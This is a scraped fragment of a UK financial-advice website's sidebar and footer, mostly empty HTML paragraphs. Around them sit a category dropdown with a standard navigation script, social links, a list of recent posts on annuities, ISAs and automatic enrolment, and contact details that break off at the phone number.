</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div id=\"categories-3\" class=\"widget widget_categories\"><p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"heading\"><p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>Post Categories</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var dropdown = document.getElementById(\"cat\"); function onCatChange() { if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></a></div>\r\n<div id=\"social_links-widget-2\" class=\"widget social_links\">\r\n<div class=\"heading\">\r\n\r\nGet Social\r\n\r\n</div>\r\n<ul class=\"social-networks clearfix\">\r\n<ul class=\"social-networks clearfix\">\r\n 	<li class=\"rss\"><a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>\r\n<div class=\"popup\">\r\n<div class=\"holder\">\r\n\r\nRSS\r\n\r\n</div>\r\n</div></li>\r\n</ul>\r\n</ul>\r\n<ul class=\"social-networks clearfix\">\r\n<ul class=\"social-networks clearfix\">\r\n 	<li class=\"twitter\"><a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>\r\n<div class=\"popup\">\r\n<div class=\"holder\">\r\n\r\nTwitter\r\n\r\n</div>\r\n</div></li>\r\n</ul>\r\n</ul>\r\n</div>\r\n<div id=\"text-23\" class=\"widget widget_text\">\r\n<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\" /></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n	</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<footer class=\"footer-area\">\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"avada-row\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n			</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<section class=\"columns columns-3\">\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<article class=\"col\">\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\"><p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>Our Latest Posts</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<ul>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\r\n						</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n					</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n				<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\r\n						</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n					</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\r\n						</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n					</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\r\n						</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n				</ul>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div style=\"clear:both;\"/></div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</article>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<article class=\"col\">\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>Contact Info</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"contact-info-container\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p class=\"address\">Manchester &amp; London</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p class=\"phone\">Phone: 